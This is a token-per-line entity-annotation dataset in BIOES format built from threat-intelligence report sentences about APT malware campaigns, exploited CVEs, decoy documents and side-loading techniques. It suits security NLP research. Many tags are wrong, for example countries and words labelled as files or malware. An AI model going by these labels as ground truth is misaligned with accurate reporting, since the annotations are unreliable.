O +Thai S-LOC +" O +or O +" O +Thailand S-LOC +" O +. O + +Threat O +actors O +may O +use O +the O +date B-FILE +string I-FILE +hardcoded E-FILE +into O +each O +Bookworm B-MAL +sample E-MAL +as O +a O +build O +identifier O +. O + +Due O +to O +these O +changes O +without O +a O +new O +date B-FILE +string E-FILE +, O +we O +believe O +the O +date B-FILE +codes E-FILE +are O +used O +for O +campaign O +tracking O +rather O +than O +a O +Bookworm S-MAL +build O +identifier O +. O + +Another O +decoy B-FILE +slideshow E-FILE +associated O +with O +the O +Bookworm B-ACT +attack I-ACT +campaign E-ACT +contains O +photos O +of O +an O +event O +called O +Bike O +for O +Dad O +2015 S-TIME +. O + +If O +the O +document O +was O +delivered O +with O +macros O +instead O +of O +exploits O +( O +CVE-2012-0158 S-VULID +, O +CVE-2013-3906 S-VULID +or O +CVE-2014-1761 S-VULID +) O +, O +then O +the O +document O +contained O +instructions O +for O +enabling O +macros O +. 
O + +The O +executable O +would O +install O +the O +real O +Ammyy O +product O +, O +but O +would O +also O +launch O +a O +file O +called O +either O +AmmyyService.exe S-FILE +or O +AmmyySvc.exe S-FILE +which O +contained O +the O +malicious O +payload O +. O + +The O +second O +, O +aptly O +titled O +" O +kontrakt87.doc S-FILE +" O +, O +copies O +a O +generic O +telecommunications B-IDTY +service E-IDTY +contract O +from O +MegaFon S-IDTY +, O +a O +large O +Russian S-LOC +mobile B-IDTY +phone I-IDTY +operator E-IDTY +. O + +In O +addition O +to O +built-in O +functionalities O +, O +the O +operators O +of O +Careto S-FILE +can O +upload O +additional O +modules O +which O +can O +perform O +any O +malicious O +task O +. O + +Careto S-FILE +'s O +Mask B-ACT +campaign E-ACT +we O +discovered O +relies O +on O +spear-phishing S-ACT +e-mails E-ACT +with O +links O +to O +a O +malicious O +website O +. O + +Sometimes O +, O +the O +attackers O +use O +sub-domains S-MAL +on O +the O +exploit S-VULNAME +websites O +, O +to O +make O +them O +seem O +more O +legitimate O +. O + +We O +initially O +became O +aware O +of O +Careto S-FILE +when O +we O +observed O +attempts O +to O +exploit S-VULNAME +a O +vulnerability O +in O +our O +products O +to O +make O +the O +malware O +" O +invisible O +" O +in O +the O +system O +. O + +The O +scanner O +was O +identified O +as O +the O +Acunetix B-FILE +Web I-FILE +Vulnerability I-FILE +Scanner E-FILE +which O +is O +a O +commercial O +penetration O +testing O +tool O +that O +is O +readily O +available O +as O +a O +14-day O +trial O +. O + +The O +decoy B-FILE +documents E-FILE +dropped O +suggest O +that O +the O +targets O +are O +likely O +to O +be O +politically S-IDTY +or O +militarily S-IDTY +motivated O +, O +with O +subjects O +such O +as O +Intelligence O +reports O +and O +political S-IDTY +situations O +being O +used O +as O +lure O +documents O +. 
O + +Lately O +, O +Patchwork S-APT +has O +been O +sending O +multiple O +RTF B-FILE +files E-FILE +exploiting O +CVE-2017-8570 S-VULID +. O + +The O +first O +of O +which O +we O +call O +' O +CONFUCIUS_A S-FILE +' O +, O +a O +malware O +family O +that O +has O +links O +to O +a O +series O +of O +attacks O +associated O +with O +a O +backdoor B-ACT +attack E-ACT +method O +commonly O +known O +as O +SNEEPY S-MAL +( O +aka O +ByeByeShell S-MAL +) O +first O +reported O +by O +Rapid7 S-SECTEAM +in O +2013 S-TIME +. O + +At O +first O +glance O +CONFUCIUS_B S-FILE +looks O +very O +similar O +to O +CONFUCIUS_A S-FILE +, O +and O +they O +are O +also O +packaged O +in O +plain O +SFX B-MAL +binary I-MAL +files E-MAL +. O + +The O +CONFUCIUS_B S-FILE +executable O +is O +disguised O +as O +a O +PowerPoint O +presentation O +, O +using O +a O +Right-To-Left-Override S-TOOL +( O +RTLO S-TOOL +) O +trick O +and O +a O +false O +icon O +. O + +We O +also O +believe O +that O +both O +clusters O +of O +activity O +have O +links O +to O +attacks O +with O +likely O +Indian O +origins O +, O +the O +CONFUCIUS_A B-ACT +attacks E-ACT +are O +linked O +to O +the O +use O +of O +SNEEPY/BYEBYESHELL S-MAL +and O +the O +CONFUCIUS_B S-FILE +have O +a O +loose O +link O +to O +Hangover S-MAL +. O + +The O +two O +malware O +families O +themselves O +are O +also O +very O +similar O +, O +and O +therefore O +we O +think O +that O +the O +shared O +technique O +is O +an O +indication O +of O +a O +single O +developer O +, O +or O +development B-IDTY +company E-IDTY +, O +behind O +both O +CONFUCIUS_A S-FILE +and O +CONFUCIUS_B S-FILE +. O + +The O +Android B-FILE +version E-FILE +, O +for O +instance O +, O +can O +steal O +SMS O +messages O +, O +accounts O +, O +contacts O +, O +and O +files O +, O +as O +well O +as O +record O +audio O +. 
O + +The O +documents O +that O +exploit S-VULNAME +CVE2017-11882 S-VULID +download O +another O +payload O +— O +an O +HTML B-TOOL +Application E-TOOL +( O +HTA S-TOOL +) O +file O +toting O +a O +malicious O +Visual B-TOOL +Basic E-TOOL +( O +VBS S-TOOL +) O +script O +— O +from O +the O +server O +, O +which O +is O +executed O +accordingly O +by O +the O +command-line O +tool O +mshta.exe S-FILE +. O + +According O +to O +our O +statistics O +, O +as O +of O +the O +beginning O +of O +2015 S-TIME +this O +botnet B-FILE +encompassed E-FILE +over O +250 O +000 O +infected O +devices O +worldwide O +including O +infecting O +more O +than O +100 O +financial B-IDTY +institutions E-IDTY +with O +80% O +of O +them O +from O +the O +top O +20 O +list O +. O + +If O +a O +bot S-FILE +was O +installed O +on O +a O +network O +that O +was O +of O +interest O +to O +the O +hacking O +group O +, O +this O +bot O +was O +then O +used O +to O +upload O +one O +of O +the O +remote O +access O +programs O +. O + +At O +first O +look O +, O +it O +pretends O +to O +be O +a O +Java B-MAL +related I-MAL +application E-MAL +but O +after O +a O +quick O +analysis O +, O +it O +was O +obvious O +this O +was O +something O +more O +than O +just O +a O +simple O +Java B-FILE +file E-FILE +. O + +Contextually O +relevant O +emails S-TOOL +are O +sent O +to O +specific O +targets O +with O +attached O +documents S-FILE +that O +are O +packed O +with O +exploit S-VULNAME +code O +and O +Trojan S-MAL +horse O +programmes O +designed O +to O +take O +advantage O +of O +vulnerabilities O +in O +software O +installed O +on O +the O +target O +'s O +computer O +. O + +The O +authors O +of O +that O +report O +identify O +three O +primary O +tools O +used O +in O +the O +campaigns S-ACT +attributed O +to O +Hidden O +Lynx O +: O +Trojan.Naid S-MAL +, O +Backdoor.Moudoor S-FILE +, O +and O +Backdoor.Hikit S-MAL +. 
O + +The O +above O +network O +shows O +relationships O +between O +three O +tools O +used O +by O +Hidden O +Lynx O +during O +its O +VOHO B-ACT +campaign E-ACT +: O +Trojan.Naid S-MAL +, O +Backdoor.Moudoor S-FILE +, O +and O +Backdoor.Hikit S-MAL +. O + +Symantec S-SECTEAM +during O +2012 S-TIME +linked O +the O +Elderwood B-ACT +Project E-ACT +to O +Operation B-ACT +Aurora E-ACT +; O +Trojan.Naid S-MAL +and O +Backdoor.Moudoor S-FILE +were O +also O +used O +in O +Aurora S-MAL +, O +by O +the O +Elderwood B-APT +Gang E-APT +, O +and O +by O +Hidden B-APT +Lynx E-APT +. O + +One O +e-mail S-TOOL +carried O +a O +Microsoft B-TOOL +PowerPoint E-TOOL +file O +named O +" O +thanks.pps S-FILE +" O +( O +VirusTotal S-TOOL +) O +, O +the O +other O +a O +Microsoft B-TOOL +Word E-TOOL +document O +named O +" O +request.docx S-FILE +" O +. O + +Around O +the O +same O +time O +, O +WildFire S-SECTEAM +also O +captured O +an O +e-mail S-TOOL +containing O +a O +Word S-TOOL +document O +( O +" O +hello.docx S-FILE +" O +) O +with O +an O +identical O +hash O +as O +the O +earlier O +Word S-TOOL +document O +, O +this O +time O +sent O +to O +a O +U.S. S-LOC +Government S-IDTY +recipient O +. O + +The O +initially-observed O +" O +thanks.pps S-FILE +" O +example O +tricks O +the O +user O +into O +running O +the O +embedded O +file O +named O +ins8376.exe S-FILE +which O +loads O +a O +payload O +DLL S-TOOL +named O +mpro324.dll S-FILE +. O + +In O +this O +case O +, O +the O +file O +used O +the O +software O +name O +" O +Cyberlink S-FILE +" O +, O +and O +a O +description O +of O +" O +CLMediaLibrary O +Dynamic B-TOOL +Link I-TOOL +Library E-TOOL +" O +and O +listing O +version O +4.19.9.98 O +. 
O + +This O +next O +stage O +library O +copies O +itself O +into O +the O +System32 O +directory O +of O +the O +Windows S-OS +folder O +after O +the O +hardcoded O +file O +name O +— O +either O +KBDLV2.DLL S-FILE +or O +AUTO.DLL S-FILE +, O +depending O +on O +the O +malware O +sample O +. O + +Once O +BARIUM S-ACT +has O +established O +rapport O +, O +they O +spear-phish S-ACT +the O +victim O +using O +a O +variety O +of O +unsophisticated S-MAL +malware S-MAL +installation O +vectors O +, O +including O +malicious B-MAL +shortcut E-MAL +( O +.lnk S-FILE +) O +files O +with O +hidden O +payloads O +, O +compiled O +HTML B-MAL +help I-MAL +( I-MAL +.chm I-MAL +) I-MAL +files E-MAL +, O +or O +Microsoft B-MAL +Office I-MAL +documents E-MAL +containing O +macros O +or O +exploits O +. O + +This O +was O +the O +case O +in O +two O +known O +intrusions O +in O +2015 S-TIME +, O +where O +attackers O +named O +the O +implant O +DLL S-TOOL +" O +ASPNET_FILTER.DLL S-FILE +" O +to O +disguise O +it O +as O +the O +DLL S-TOOL +for O +the O +ASP.NET B-FILE +ISAPI I-FILE +Filter E-FILE +. O + +In O +early O +2016 S-TIME +the O +Callisto O +Group O +began O +sending O +highly O +targeted O +spear B-ACT +phishing E-ACT +emails S-TOOL +with O +malicious B-FILE +attachments E-FILE +that O +contained O +, O +as O +their O +final O +payload O +, O +the O +" O +Scout S-MAL +" O +malware O +tool O +from O +the O +HackingTeam O +RCS O +Galileo O +platform O +. O + +The O +malicious B-FILE +attachments E-FILE +purported O +to O +be O +invitations S-MAL +or O +drafts B-MAL +of I-MAL +the I-MAL +agenda E-MAL +for O +the O +conference O +. O + +We O +encountered O +the O +first O +document O +exploit S-VULNAME +called O +" O +THAM B-FILE +luan I-FILE +- I-FILE +GD I-FILE +- E-FILE +NCKH2.doc S-FILE +" O +a O +few O +days O +ago O +, O +which O +appears O +to O +be O +leveraging O +some O +vulnerabilities O +patched O +with O +MS12-060 S-MAL +. 
O + +This O +document O +, O +written O +in O +Vietnamese O +, O +appears O +to O +be O +reviewing O +and O +discussing O +best O +practices O +for O +teaching O +and O +researching O +scientific O +topics O +. O + +Examples O +as O +early O +as O +2008 S-TIME +document B-FILE +malware E-FILE +operations O +against O +Tibetan B-IDTY +non-governmental I-IDTY +organizations E-IDTY +( O +NGOs S-IDTY +) O +that O +also O +targeted O +Falun B-IDTY +Gong E-IDTY +and O +Uyghur B-IDTY +groups E-IDTY +. O + +There O +is O +the O +exploit B-FILE +code E-FILE +and O +malware O +used O +to O +gain O +access O +to O +systems O +, O +the O +infrastructure O +that O +provides O +command O +and O +control O +to O +the O +malware O +operator O +, O +and O +the O +human O +elements O +– O +developers O +who O +create O +the O +malware O +, O +operators O +who O +deploy O +it O +, O +and O +analysts O +who O +extract O +value O +from O +the O +stolen O +information O +. O + +The O +operation O +against O +the O +Tibetan B-IDTY +Parliamentarians E-IDTY +illustrates O +the O +continued O +use O +of O +malicious B-FILE +attachments E-FILE +in O +the O +form O +of O +documents B-MAL +bearing I-MAL +exploits E-MAL +. O + +The O +first O +attack O +started O +in O +early O +July S-TIME +with O +a O +ShimRatReporter S-FILE +payload O +. O + +In O +their O +Operation B-ACT +Tropic I-ACT +Trooper E-ACT +report O +, O +Trend B-SECTEAM +Micro E-SECTEAM +documented O +the O +behaviour O +and O +functionality O +of O +an O +espionage B-FILE +toolkit E-FILE +with O +several O +design O +similarities O +to O +those O +observed O +in O +the O +various O +components O +of O +KeyBoy S-MAL +. O + +The O +exploit B-FILE +document E-FILE +carrying O +this O +alternate O +KeyBoy S-MAL +configuration O +also O +used O +a O +decoy B-FILE +document E-FILE +which O +was O +displayed O +to O +the O +user O +after O +the O +exploit S-VULNAME +launched O +. 
O + +This O +technique O +hides O +the O +true O +C2 S-TOOL +server O +from O +researchers O +that O +do O +not O +have O +access O +to O +both O +the O +rastls.dll S-FILE +and O +Sycmentec.config B-FILE +files E-FILE +. O + +This O +file O +requires O +the O +target O +to O +attempt O +to O +open O +the O +.lnk B-FILE +file E-FILE +, O +which O +redirects O +the O +user O +to O +a O +Windows S-OS +Scripting O +Component O +( O +.wsc S-FILE +) O +file O +, O +hosted O +on O +an O +adversary-controlled O +microblogging O +page O +. O + +Upon O +successful O +exploitation O +, O +the O +attachment S-FILE +will O +install O +the O +Trojan S-MAL +known O +as O +NetTraveler S-MAL +using O +a O +DLL B-FILE +side-loading E-FILE +attack O +technique O +. O + +Kaspersky B-SECTEAM +Lab E-SECTEAM +'s O +products O +detect O +the O +Microsoft B-IDTY +Office E-IDTY +exploits S-VULNAME +used O +in O +the O +spear-phishing S-ACT +attacks E-ACT +, O +including O +Exploit.MSWord.CVE-2010-333 S-FILE +, O +Exploit.Win32.CVE-2012-0158 S-FILE +. O + +The O +files S-FILE +exploit S-VULNAME +the O +well-known O +Microsoft B-TOOL +Office E-TOOL +vulnerability O +, O +CVE-2012-0158 S-VULID +, O +to O +execute O +malicious O +code O +in O +order O +to O +take O +control O +of O +the O +targeted O +systems O +. O + +We O +also O +discovered O +an O +interesting O +piece O +of O +rare O +malware S-MAL +created O +by O +this O +threat O +actor O +– O +a O +Bluetooth B-FILE +device I-FILE +harvester E-FILE +. O + +For O +example O +, O +Bisonal B-APT +malware E-APT +in O +2012 S-TIME +used O +send() O +and O +recv() O +APIs O +to O +communicate O +with O +its O +C2. O +This O +Bisonal S-FILE +variant O +used O +in O +the O +latest O +attack O +communicates O +with O +one O +of O +the O +following O +hard-coded O +C2 S-TOOL +addresses O +by O +using O +the O +HTTP B-ACT +POST E-ACT +method O +on O +TCP S-PROT +PROT O +443 O +. 
O + +Previous O +reports O +have O +discussed O +Bisonal B-FILE +malware E-FILE +used O +in O +attacks O +against O +Japan S-LOC +, O +South B-LOC +Korea E-LOC +and O +Russia S-LOC +. O + +This O +particular O +sample S-FILE +we O +found O +targeted O +an O +organization O +in O +Russia S-LOC +and O +there O +is O +a O +specific O +system O +language O +check O +for O +Cyrillic O +and O +no O +others O +. O + +If O +it's S-FILE +Cyrillic S-MAL +and O +the O +command O +to O +the O +shell O +is O +not O +‘ipconfig’ O +, O +the O +threat O +converts O +the O +command O +result O +text O +encoding O +from O +Cyrillic O +to O +UTF-16 S-MAL +. O + +Similar O +to O +the O +Bisonal S-FILE +variant O +targeting O +the O +Russian B-LOC +organization E-LOC +, O +this O +sample O +was O +also O +disguised O +as O +PDF S-TOOL +document O +. O + +The O +contents O +of O +the B-FILE +decoy I-FILE +PDF E-FILE +is O +a O +job O +descriptions O +with O +the O +South B-LOC +Korean E-LOC +Coast B-IDTY +Guard E-IDTY +. O + +The O +installed B-FILE +EXE I-FILE +file E-FILE +is O +almost O +exactly O +the O +same O +as O +the O +DLL S-TOOL +version O +of O +Bisonal B-FILE +variant E-FILE +used O +against O +the O +Russian S-LOC +organization O +. O + +ined O +in O +the O +archive O +is O +called O +DriverInstallerU.exe” S-FILE +but O +its O +metadata O +shows O +that O +its O +original O +name O +is O +Interenet B-FILE +Assistant.exe” E-FILE +. O + +In O +this O +sample O +, O +however O +, O +the O +module O +names O +were O +changed O +from O +actors O +and O +characters’ O +names O +to O +car O +models O +, O +namely O +BMW_x1” S-FILE +, O +BMW_x2” S-FILE +and O +up O +to O +BMW_x8” S-FILE +. O + +wuaupdt.exe S-FILE +is O +a O +CMD B-MAL +backdoor E-MAL +, O +which O +can O +receive O +and O +execute O +CMD O +commands O +sent O +from O +C2 S-TOOL +. 
O + +Furthermore O +, O +it O +has O +similar O +code O +logic O +as O +previous O +ones O +wuaupdt.exe S-FILE +in O +this O +attack O +appears O +in O +previous O +Donot O +attack O +, O +and O +C2 S-TOOL +addresses O +are O +same O +to O +previous O +ones O +. O + +Other O +open O +source O +and O +semi-legitimate O +pen-testing O +tools O +like O +nbtscan S-FILE +and O +powercat S-FILE +are O +being O +used O +for O +mapping O +available O +resources O +and O +lateral O +movement O +as O +well O +. O + +As O +described O +in O +the O +infection O +flow O +, O +one O +of O +the O +first O +uses O +of O +the O +AutoHotKey B-FILE +scripts E-FILE +is O +to O +upload O +a O +screenshot O +from O +the O +compromised O +PC O +. O + +Throughout O +our O +investigation O +, O +we O +have O +found O +evidence O +that O +shows O +operational O +similarities O +between O +this O +implant S-FILE +and O +Gamaredon S-APT +Group O +. O + +The O +techniques O +and O +modules O +employed O +by O +EvilGnome S-APT +— O +that O +is O +the O +use O +of O +SFX S-MAL +, O +persistence O +with O +task O +scheduler O +and O +the O +deployment O +of O +information O +stealing O +tools—remind O +us O +of O +Gamaredon O +Group’s O +Windows B-FILE +tools E-FILE +. O + +We O +can O +observe O +that O +the O +sample S-FILE +is O +very O +recent O +, O +created O +on O +Thursday O +, O +July B-TIME +4 E-TIME + +As O +can O +be O +observed O +in O +the O +illustration O +above O +, O +the O +makeself B-FILE +script E-FILE +is O +instructed O +to O +run O +./setup.sh S-FILE +after O +unpacking O +. O + +The O +ShooterAudio B-FILE +module E-FILE +uses O +PulseAudio S-MAL +to O +capture O +audio O +from O +the O +user's O +microphone O +. O + +makeself.sh S-FILE +is O +a O +small O +shell B-FILE +script E-FILE +that O +generates O +a O +self-extractable O +compressed O +tar O +archive O +from O +a O +directory O +. 
O + +The O +RAT S-FILE +, O +however O +, O +had O +a O +multitude O +of O +functionalities O +(as O +listed O +in O +the O +table O +below) O +such O +as O +to O +download O +and O +execute O +, O +compress O +, O +encrypt O +, O +upload O +, O +search O +directories O +, O +etc O +. O + +In O +a O +more O +recent O +version O +of O +the O +modified O +Gh0st B-FILE +RAT E-FILE +malware O +, O +Ghost B-APT +Dragon E-APT +implemented O +dynamic O +packet O +flags O +which O +change O +the O +first O +five O +bytes O +of O +the O +header O +in O +every O +login O +request O +with O +the O +controller O +. O + +One O +hour O +later O +, O +Bemstour S-FILE +was O +used O +against O +an O +educational O +institution O +in O +Belgium S-FILE +. O + +Bemstour S-FILE +is O +specifically O +designed O +to O +deliver O +a O +variant O +of O +the O +DoublePulsar B-MAL +backdoor E-MAL +. O + +DoublePulsar S-FILE +is O +then O +used O +to O +inject O +a O +secondary O +payload O +, O +which O +runs O +in O +memory O +only O +. O + +A O +significantly O +improved O +variant O +of O +the O +Bemstour S-FILE +exploit S-VULNAME +tool O +was O +rolled O +out O +in O +September B-TIME +2016 E-TIME +, O +when O +it O +was O +used O +in O +an O +attack O +against O +an O +educational O +institution O +in O +Hong B-LOC +Kong E-LOC +. O + +Bemstour S-FILE +was O +used O +again O +in O +June O +2017 O +in O +an O +attack O +against O +an O +organization O +in O +Luxembourg S-LOC +. O + +Between O +June O +and O +September O +2017 O +, O +Bemstour S-FILE +was O +also O +used O +against O +targets O +in O +the O +Philippines S-LOC +and O +Vietnam S-LOC +. O + +Development O +of O +Bemstour S-FILE +has O +continued O +into O +2019 S-TIME +. 
O + +Unlike O +earlier O +attacks O +when O +Bemstour S-FILE +was O +delivered O +using O +Buckeye's O +Pirpi S-FILE +backdoor S-FILE +, O +in O +this O +attack O +Bemstour O +was O +delivered O +to O +the O +victim O +by O +a O +different B-MAL +backdoor E-MAL +Trojan S-MAL +( O +Backdoor.Filensfer S-MAL +) O +. O + +The O +most O +recent O +sample O +of O +Bemstour S-FILE +seen O +by O +Symantec S-SECTEAM +appears O +to O +have O +been O +compiled O +on O +March B-TIME +23 E-TIME +, O +2019 O +, O +eleven O +days O +after O +the O +zero-day S-VULNAME +vulnerability O +was O +patched O +by O +Microsoft S-IDTY +. O + +Filensfer S-FILE +is O +a O +family O +of O +malware O +that O +has O +been O +used O +in O +targeted O +attacks O +since O +at O +least O +2013 S-TIME +. O + +While O +Symantec S-SECTEAM +has O +never O +observed O +the O +use O +of O +Filensfer S-FILE +alongside O +any O +known O +Buckeye O +tools O +, O +information O +shared O +privately O +by O +another O +vendor O +included O +evidence O +of O +Filensfer O +being O +used O +in O +conjunction O +with O +known O +Buckeye B-FILE +malware E-FILE +(Backdoor.Pirpi) S-MAL +. O + +CVE-2017-0143 S-VULID +was O +also O +used O +by O +two O +other O +exploit S-VULNAME +tools—EternalRomance S-FILE +and O +EternalSynergy—that S-FILE +were O +released O +as O +part O +of O +the O +Shadow O +Brokers O +leak O +in O +April B-TIME +2017 E-TIME +. O + +Buckeye's O +exploit S-VULNAME +tool O +, O +EternalRomance S-FILE +, O +as O +well O +as O +EternalSynergy S-FILE +, O +can O +exploit S-VULNAME +the O +CVE-2017-0143 S-FILE +message O +type O +confusion O +vulnerability O +to O +perform O +memory O +corruption O +on O +unpatched O +victim O +computers O +. O + +this O +RTF S-TOOL +exploits O +again O +the O +CVE-2017-1882 S-VULID +on O +eqnedt32.exe S-FILE +. O + +And O +the O +dropper S-FILE +execute O +the O +iassvcs.exe S-FILE +to O +make O +a O +side O +loading O +and O +make O +the O +persistence O +. 
O + +Over O +the O +past O +three O +years O +, O +Filensfer S-FILE +has O +been O +deployed O +against O +organizations O +in O +Luxembourg S-LOC +, O +Sweden S-LOC +, O +Italy S-LOC +, O +the B-LOC +UK E-LOC +, O +and O +the B-LOC +U.S E-LOC +. O + +Our O +analysis O +of O +this O +malware O +shows O +that O +it O +belongs O +to O +Hussarini S-FILE +, O +also O +known O +as O +Sarhust O +, O +a O +backdoor O +family O +that O +has O +been O +used O +actively O +in O +APT O +attacks O +targeting O +countries O +in O +the O +ASEAN B-LOC +region E-LOC +since O +2014 S-TIME +. O + +OutExtra.exe S-FILE +is O +a O +signed O +legitimate O +application O +from O +Microsoft S-IDTY +named O +finder.exe S-FILE +. O + +Today O +, O +this O +malware S-FILE +is O +still O +actively O +being O +used O +against O +the O +Philippines S-LOC +. O + +Xagent” S-FILE +is O +the O +original O +filename O +Xagent.exe S-FILE +whereas O +seems O +to O +be O +the O +version O +of O +the O +worm S-FILE +. O + +Our O +technical O +analysis O +of O +the O +malware S-FILE +used O +in O +these O +attacks O +showed O +close O +ties O +to O +BS2005 B-FILE +backdoors E-FILE +from O +operation O +Ke3chang O +, O +and O +to O +a O +related O +TidePool B-FILE +malware E-FILE +family O +discovered O +by O +Palo B-SECTEAM +Alto E-SECTEAM +Networks O +in O +2016 S-TIME +that O +targeted O +Indian O +embassies O +across O +the O +globe O +. O + +The O +malicious O +actors O +behind O +the O +Okrum B-FILE +malware E-FILE +were O +focused O +on O +the O +same O +targets O +in O +Slovakia S-LOC +that O +were O +previously O +targeted O +by O +Ketrican O +2015 O +backdoors S-FILE +. O + +We O +started O +connecting O +the O +dots O +when O +we O +discovered O +that O +the O +Okrum B-FILE +backdoor E-FILE +was O +used O +to O +drop O +a O +Ketrican B-FILE +backdoor E-FILE +, O +freshly O +compiled O +in O +2017 O +. 
O + +In O +2017 O +, O +the O +same O +entities O +that O +were O +affected O +by O +the O +Okrum B-FILE +malware E-FILE +and O +by O +the O +2015 O +Ketrican B-FILE +backdoors E-FILE +again O +became O +targets O +of O +the O +malicious O +actors O +. O + +This O +time O +, O +the O +attackers O +used O +new O +versions O +of O +the O +RoyalDNS B-FILE +malware E-FILE +and O +a O +Ketrican S-FILE +2017 O +backdoor O +. O + +According O +to O +ESET S-SECTEAM +telemetry O +, O +Okrum S-FILE +was O +first O +detected O +in O +December B-TIME +2016 E-TIME +, O +and O +targeted O +diplomatic O +missions O +in O +Slovakia S-LOC +, O +Belgium S-LOC +, O +Chile S-LOC +, O +Guatemala S-LOC +and O +Brazil S-LOC +throughout O +2017 O +. O + +According O +to O +our O +telemetry O +, O +Okrum S-FILE +was O +used O +to O +target O +diplomatic O +missions O +in O +Slovakia S-LOC +, O +Belgium S-LOC +, O +Chile S-LOC +, O +Guatemala S-LOC +, O +and O +Brazil S-LOC +, O +with O +the O +attackers O +showing O +a O +particular O +interest O +in O +Slovakia O +. O + +The O +detection O +evasion O +techniques O +we O +observed O +in O +the O +Okrum S-FILE +malware O +include O +embedding O +the O +malicious O +payload O +within O +a O +legitimate O +PNG O +image O +, O +employing O +several O +anti-emulation O +and O +anti-sandbox O +tricks O +, O +as O +well O +as O +making O +frequent O +changes O +in O +implementation O +. O + +According O +to O +ClearSky S-SECTEAM +, O +the O +suspected O +Lazarus O +operatives O +looked O +to O +leverage O +a O +vulnerability O +in O +outdated O +WinRAR S-FILE +file-archiving O +software O +that O +hackers O +have O +been O +exploiting O +since O +it O +was O +disclosed O +last O +month O +. O + +The O +diagram O +below O +illustrates O +how O +we O +believe O +the O +actors O +behind O +the O +Sea B-FILE +Turtle E-FILE +campaign O +used O +DNS S-PROT +hijacking O +to O +achieve O +their O +end O +goals O +. 
O + +If O +the O +user O +enables O +macro O +to O +open O +the O +xlsm B-MAL +file E-MAL +, O +it S-FILE +will O +then O +drop O +the O +legitimate O +script O +engine O +AutoHotkey O +along O +with O +a O +malicious O +script O +file O +. O + +Create O +a O +link B-FILE +file E-FILE +in O +the O +startup O +folder O +for O +AutoHotkeyU32.exe S-FILE +, O +allowing O +the O +attack O +to O +persist O +even O +after O +a O +system O +restart O +. O + +Such O +attacks S-FILE +highlight O +the O +need O +for O +caution O +before O +downloading B-ACT +files E-ACT +from O +unknown O +sources O +and O +enabling O +macro O +for O +files O +from O +unknown O +sources O +. O + +Honeycomb S-FILE +toolserver O +receives O +exfiltrated O +information O +from O +the O +implant; O +an O +operator O +can O +also O +task O +the O +implant O +to O +execute O +jobs O +on O +the O +target O +computer O +, O +so O +the O +toolserver O +acts O +as O +a O +C2 S-TOOL +(command O +and O +control) O +server O +for O +the O +implant O +. O + +UMBRAGE S-FILE +components O +cover O +keyloggers O +, O +password O +collection O +, O +webcam O +capture O +, O +data O +destruction O +, O +persistence O +, O +privilege O +escalation O +, O +stealth O +, O +anti-virus O +(PSP) O +avoidance O +and O +survey O +techniques O +. O + +'Improvise' S-FILE +is O +a O +toolset O +for O +configuration O +, O +post-processing O +, O +payload O +setup O +and O +execution O +vector O +selection O +for O +survey/Exfiltration S-ACT +tools O +supporting O +all O +major O +operating O +systems O +like O +Windows S-OS +( O +Bartender S-TOOL +) O +, O +MacOS S-OS +( O +JukeBox S-TOOL +) O +and O +Linux S-ACT +( O +DanceFloor S-TOOL +) O +. 
O + +This O +sample S-FILE +, O +similar O +to O +other O +Trochilus S-FILE +samples O +, O +was O +deployed O +using O +a O +DLL S-TOOL +sideloading O +method O +utilizing O +three O +files O +, O +uploaded O +to O +the O +same O +folder O +on O +the O +victim O +machine O +as O +identified O +in O +US-CERT O +advisory O +TA17-117A O +last O +revised O +on O +December O +20 O +, O +2018 S-TIME +. O + +The O +configuration B-FILE +file E-FILE +then O +loads O +the O +Trochilus O +payload O +into O +memory O +by O +injecting O +it O +into O +a O +valid O +system O +process O +. O + +Additionally O +, O +the O +same O +DLL S-TOOL +sideloading O +technique O +observed O +in O +the O +Visma S-MAL +attack O +was O +used O +, O +and O +many O +of O +the O +tools O +deployed O +by O +the O +APT10 S-APT +shared O +naming O +similarities O +as O +well O +1.bat S-MAL +, O +cu.exe S-MAL +, O +ss.rar S-MAL +, O +r.exe S-MAL +, O +pd.exe S-MAL +. O +Most O +interestingly O +, O +Rapid7 S-SECTEAM +observed O +the O +use O +of O +the O +Notepad++ O +updater O +gup.exe S-FILE +as O +a O +legitimate O +executable O +to O +sideload O +a O +malicious O +DLL S-TOOL +(libcurl.dll) O +in O +order O +to O +deploy O +a O +variant O +of O +the O +UPPERCUT O +backdoor O +also O +known O +as O +ANEL S-FILE +. O + +Insikt B-APT +Group E-APT +analysis O +of O +network O +metadata O +to O +and O +from O +the O +VPN S-TOOL +endpoint O +IPs O +revealed O +consistent O +connectivity O +to O +Citrix-hosted S-FILE +infrastructure O +from O +all O +eight O +VPN S-TOOL +endpoint O +IPs O +starting O +on O +August B-TIME +17 E-TIME +, O +2018 S-TIME +— O +the O +same O +date O +the O +first O +authenticated O +login O +to O +Visma’s O +network O +was O +made O +using O +stolen O +credentials O +. O + +KHRAT S-FILE +is O +a O +backdoor B-MAL +trojan E-MAL +purported O +to O +be O +used O +with O +the O +China-linked S-LOC +cyberespionage O +group O +DragonOK S-APT +. 
O + +Rapid7 S-SECTEAM +reviewed O +malware O +discovered O +in O +the O +victim’s O +environment O +and O +found O +implants O +that O +used O +Dropbox S-FILE +as O +the O +C2 S-TOOL +. O + +The O +analyzed O +RTF O +files O +share O +the O +same O +object O +dimension O +(objw2180\objh300) O +used O +to O +track O +the O +RTF O +weaponizer O +in O +our O +previous O +report O +, O +however O +, O +the O +sample S-FILE +was O +not O +exploiting O +CVE-2017-11882 S-VULID +or O +CVE-2018-0802 S-VULID +. O + +After O +further O +analysis O +, O +it O +was O +discovered O +that O +the O +RTF B-FILE +files E-FILE +were O +exploiting O +the O +CVE-2018-0798 S-VULID +vulnerability O +in O +Microsoft S-IDTY +’s O +Equation B-TOOL +Editor E-TOOL +( O +EQNEDT32 S-TOOL +) O +. O + +Anomali S-SECTEAM +Researchers O +were O +able O +to O +identify O +multiple O +samples O +of O +malicious O +RTF O +documents O +ITW S-FILE +using O +the O +same O +exploit S-VULNAME +for O +CVE-2018-0798 S-VULID +. O + +The O +earliest O +use O +of O +the O +exploit S-VULNAME +ITW S-FILE +we O +were O +able O +to O +identify O +and O +confirm O +is O +a O +sample O +(e228045ef57fb8cc1226b62ada7eee9b) O +dating O +back O +to O +October B-TIME +2018 E-TIME +(VirusTotal S-TOOL +submission O +of O +2018-10-29) O +with O +the O +RTF S-TOOL +creation O +time O +2018-10-23 S-TIME +. O + +Upon O +decrypting O +and O +executing O +, O +it O +drops O +two O +additional O +files O +wsc_proxy.exe” S-FILE +(legitimate O +Avast O +executable) O +and O +a O +malicious O +DLL S-TOOL +wsc.dll” S-FILE +in O +the O +%TEMP% O +folder O +. O + +However O +, O +Beginning O +on O +25 O +June O +2019 O +, O +we O +started O 